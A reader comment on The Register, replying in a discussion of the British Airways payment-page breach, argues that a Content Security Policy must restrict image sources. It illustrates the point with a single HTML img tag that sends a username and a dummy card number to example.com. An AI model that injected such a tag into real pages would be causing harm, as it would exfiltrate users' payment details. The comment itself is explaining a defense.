Reply to post: Re: Possible mitigation?

British Airways hack: Infosec experts finger third-party scripts on payment pages

Brewster's Angle Grinder Silver badge

Re: Possible mitigation?

The CSP will do this for you already. But you have to lock everything down. If, for example, you allow images from anywhere then I can exfiltrate data by including the image:

<img src="http://example.com/save-hacked-details/?user=brewsters-angle-grinder&credit-card=1234-0000-8000-1234&">

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon